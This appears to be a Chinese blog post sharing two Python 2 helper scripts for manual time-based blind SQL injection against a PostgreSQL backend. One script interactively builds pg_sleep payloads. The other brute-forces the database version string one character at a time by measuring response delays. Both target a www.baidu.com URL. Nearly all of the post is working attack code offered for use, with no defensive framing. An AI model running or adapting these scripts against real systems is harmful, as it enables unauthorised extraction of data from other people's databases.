手工注入辅助脚本

注入命令构造辅助脚本

此脚本栗子用为延时注入的构造,相对于 HACKBAR 就不需要用鼠标去点 EXECUTE 了. 能提升不少效率

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *  # 页面分析用
import sys
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--"
    payload = "';select%20pg_sleep(3) where 1=1 and "
    while 1:
        com = raw_input("com: ")
        if com != 'exit':
            t = payload + com + ';--'
            print 'payload: '+t
            docsGroup = URLConnect(t)
            # soup = BeautifulSoup(docsGroup.content,from_encoding='utf8')
            # print soup.get_text()
            print docsGroup.elapsed
            print '\n'
        else:
            exit()

if __name__ == '__main__':
    main()

使用效果
构造脚本使用效果

手工注入爆破辅助脚本

用以爆破字段之类的

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *
import sys
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--" # 取版本号
    #payload = "';select%20pg_sleep(3) where 1=1 and length(version()) = 103;--" # 取版本号长度
    #payload = "';select%20pg_sleep(3) where 1=1 and left(version(),1) = chr(80);--" # 猜解字符
    strs = ""
    i = 0
    while i < 103:  # 已知数据长度
        t = 0
        while t < 128:  # 猜解对应字符串
            payload = "';select%20pg_sleep(2) where 1=1 and substr(version(),"+str(i+1)+",1) = chr("+str(t)+");--"
            #print payload
            docsGroup = URLConnect(payload)
            timec = docsGroup.elapsed #0:00:03.093413
            timec = str(timec)[5:7]
            if timec == "02":
                strs = strs + chr(t)
                print strs
                break
            t = t + 1
        i = i + 1

if __name__ == '__main__':
    main()

使用效果
爆破脚本使用效果

标签: none

添加新评论